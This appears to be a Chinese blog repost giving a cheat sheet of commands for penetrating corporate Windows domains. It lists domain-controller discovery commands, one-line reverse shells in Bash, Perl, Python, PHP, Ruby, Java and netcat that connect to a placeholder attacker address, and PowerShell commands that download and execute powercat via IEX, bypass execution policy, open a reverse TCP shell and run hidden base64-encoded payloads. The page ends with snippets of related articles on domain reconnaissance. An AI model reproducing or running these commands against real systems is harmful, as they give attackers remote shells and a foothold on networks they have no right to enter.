内网域实战渗透常用命令

最新推荐文章于 2022-09-25 09:26:31 发布
最新推荐文章于 2022-09-25 09:26:31 发布
阅读量428 收藏 2
点赞数
文章标签: 网络安全 内网
原文链接:https://mp.weixin.qq.com/s/gSHUVJW_J4CxizzzknMxmg
版权

内网域实战渗透常用命令

查找域控的几个常用方法

1.net view

net view /domain

2.set log

set log

3.通过srv记录

nslookup -type=SRV _ldap._tcp.corp

4.使用nltest

nltest /dclist:corp

5.使用dsquery

DsQuery Server -domain corp

6.使用netdom

netdom query pdc

这些都是win系统自带的命令,有的时候win版本不同,有的命令会不存在,所以多一种方法,多一种成功的可能性,实际渗透,自行根据目标环境变换。

各种语言一句话反弹shell

Bash [不通用,跟linux发行版本有关,在ubuntu上测试成功]

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3>&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d>&%d 2>&%d",f,f,f)'

Java

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 2="" |="" while="" read="" line;="" do="" \$line="">&5 >&5; done"] as String[]) p.waitFor()

netcat

nc -e /bin/sh x.x.x.x 2333

但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决
rm/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f

常用Powershell命令

1.通过远程下载来执行

Set-ExecutionPolicy RemoteSigned IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

2.把ps脚本传到本地后执行

PowerShell.exe -ep Bypass -File d:\powercat.ps1

3.本地交互式执行

E:\>PowerShell.exe -ExecutionPolicy Bypass Invoke-PowerShellTcp -Reverse -IPAddress 10.18.180.18 -Port 4444

4.把ps脚本编码成base64来执行[实战用的最多]

powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc base64加密过的命令
CNwanku
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透思维导图指北
10-04
内网渗透思维导图指北
渗透常用命令
神隐哥的博客
03-02 1485
信息搜集 net view /domain:XXX 查看XXX中的机器列表 net view /domain 查看内网中有多少个 setspn -T jumbolab.com -Q */* 快速寻找内网中注册的服务 net user /domain 查看用户 net group "domain admins" /domain 查看管 net time /domain 定位控。也可以通过ipconfig /all。一般DNS就是控 nltest /domain_trusts 列出信任关系 c
渗透常用基础命令
whojoe的博客
01-21 616
渗透常用基础命令信息收集基础命令常用工具 信息收集基础命令 查询与控制器主机名 net group “domain controllers” /domain 查询管理用户 net group “domain admins” /domain 查看所有用户 net user /domain 查看加入的所有计算机名 net group "domain computers" /domain 查看密码策略 net accounts /domain 常用工具 使用procdump将目标的lsass.
内网之windows相关概念介绍 工作组、活动目录、权限、划分等
有勇气的牛排博客
09-10 2361
1 内网渗透基础 内网/局网(Local Area Network,LAN),是指在某一区内有多台计算机互联而成的计算机组,组网范围通常在数千米以内。在局网中,可以实现文件管理、应用软件共享、打印机共享、工作组的日程安排、电子邮件和传真通信服务等。内网是封闭的,可以有办公室内的两台计算机组成,也可以由一个公司内的大量计算机组成。 1.1 内网渗透基础知识 1.1.1 工作组 为了解决成千上百的电脑连接在一起组成的局网,管理混乱问题,有了**工作组(Work Group)**概念。 例如: 有技术部和
内网基础
qq_45455136的博客
07-11 590
组织单元(OU)是中包含的一类目录对象如用户、计算机和组、文件与打印机等资源,是一个容器,可以在OU上部署组策略。创建组织单元委派控制(分配权限)组组是用户账号的集合。通过向组分配权限,就可以不必向每个用户分别分配权限。本地组本地组成员来自林中任何中的用户账户、全局组和通用组以及本中的本地组,在本范围内可用。全局组全局组成员来自于同一的用户账户和全局组,在林范围内可用。通用组通用组成员来自林中任何中的用户账户、全局组和其他的通用组,在全林范围内可用。
内基础信息收集
qq_45455136的博客
07-17 1428
内基础信息收集 查询用户权限 判断的存在 NET命令 Net View Net User Net Use Net Start Net Pause Net Continue Net stop Net Statistics Net Share Net Session Net Localgroup 查询
内网渗透文档过程有截图
07-02
内网渗透文档过程有截图
domainTools:内网渗透小工具
03-20
我的C ++学习过程-编写的渗透小工具 0x01。 NetLocalGroupGetMembers 功能:查询目标服务器本地管理组的成员 0x02。 NetLocalGroupEnum 功能:返回指定服务器上的所有本地组 0x03。 NetGroupGetUsers 功能:...
完整的内网渗透-暗月培训之项目六1
08-03
1. 环境介绍3 2. 信息收集3 3. 对网站进行安全检测4 5. 跨网段渗透15
星云mib 信息
06-01
星云mib 信息,根据里面内容可以获取对应的监控信息,已经测试过好用,大家放心下载,网星云mib 信息
FazScan:| FazScan是一个Perl程序,用于进行一些漏洞扫描和渗透测试|
02-05
FazScan FazScan是一个Perl程序,用于进行漏洞扫描和渗透测试。 该程序有18个最终选择。 FazScan,漏洞扫描和渗透测试程序 可用选项: 1. SQL注入学期 2.通用SQLi漏洞扫描程序 3.高级SQLi漏洞扫描程序 4.通用Web漏洞扫描程序 5.自动化CMS检测器 6. Web CMS WordPress漏洞扫描程序 7. Web CMS Magento漏洞扫描程序 8. Web CMS Joomla漏洞扫描程序 9. Web CMS Lokomedia漏洞扫描程序 10. Web CMS Drupal漏洞扫描程序+ Shell上传程序 11. Web信息收集工具包
Cobalt Strike(十)内网登录认证
qq_56426046的博客
09-25 629
系统备注kaliteamserver10.10.10.4控10.10.10.6本次测试的重点victim 被控端。
Windows 判断是否存在,搜集内基本信息,查看控制器
Martin 的博客
12-04 2万+
四、判断是否存在 了解本机信息后,就要判断当前内网中是都存在。 4.1 ipconfig 查看网关IP地址、DNS的ip地址、名、本机是否和DNS服务器处于同一网段等信息。 ipconfig /all 然后用nslookup解析 名的IP地址,查看是否与DNS服务器在同一IP上。 nslookup security.com 4.2 查看系统详细信息 systeminfo 从图可看到处于security.com 4.3 查看当前登录用户 net conf.
内网渗透控制命令
sinat_38378265的博客
03-26 1394
控制命令 1.net view 要使用net view需要启动server和computer browers这两个服务。 net view可以显示列表、计算机列表或指定计算机的共享资源列表。 2.net view /domain 获取当前所有 3.net view /domain:名 获取这个里所有的计算机名 4.ping -4 计算机名 获取这个计算机的ip4(因为直接ping计算机名...
常用渗透命令整理
weixin_30394633的博客
04-01 311
查询管理员用户:net group “domain admins” /domain 查询用户:net user /domain 查询名称:net view /domain 查询内计算机:net view /domain:XX 查询控制器:net time /domain 查询所有控制器:dsquery server 例:dsquery server -domain supe...
net命令参数详细说明
王博毅-BG1JT [不会写代码的程序员]
01-29 2156
(1)NET VIEW 作 用:显示列表、计算机列表或指定计算机的共享资源列表。 命令格式:net view [////computername │ /domain[:domainname] 参数介绍: 键入不带参数的net view显示/"当前/"的计算机列表。 ////computername 指定要查看其共享资源的计算机。 /domain[omainname]指定要查看其可用计算机的
内网渗透基石篇:内网基础知识及环境搭建
MachineGunJoe666
04-27 914
目录 第一部分 内网基础知识点 内网也指局网,是指在某一区由多台计算机互连而成的计算机组。 1.工作组 对局网中的计算机进行分类,使得网络更有序。计算机的管理依然是各自为政,所有计算机依然是对等的,松散会员制,可以随意加入和退出,且不同工作组之间的共享资源可以相互访问。 2. 分类:单、子、父树、森林、DNS名服务器 “”是一个有安全边界的计算机组合(一个中的用户无法访问另一个中的资源),内资源由一台控制器(Domain Controll...
渗透相关的常用命令
404
01-31 3056
环境:windows server 2012 控 服务器一台 :dongcidaci.org 这里先说一说渗透的常规流程: **内网[]渗透,不外乎获取内网[]最高权限. 通常做法就是拿到某个管理员的口令,然后控制服务器,获取更多的信息.** 查看打下的机器是否在管理模式中———>>获取用户————>>查看内网存在多少个————>>获取管理员列表————>>列出内
内网渗透-管理员定位
热门推荐
weixin_43526443的博客
02-08 7万+
目录 Part1 内网渗透基础概念 1 什么是 1. 权限管理比较集中,管理成本降低 2. 保密性加强 3. 安全性加强 4. 提高了便捷性 2 渗透思路 Part2 管理员定位基础 Part3 管理员手动定位 Part4 自动化收集时常用的管理员定位工具 SPN扫描 psloggedon.exe PVEFindADUser.exe netview.exe Name的NSE脚本 PowerView.PS1脚本 Part1 内网渗透基础概念 1 什么是...
iptables 仅允许从内部连接到网192.168.100.0/24
最新发布
06-03
以下是 iptables 命令配置仅允许从内部连接到网 192.168.100.0/24: ```bash # 允许回环接口 lo 的所有流量通过 iptables -A INPUT -i lo -j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT # 允许内部连接到网 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值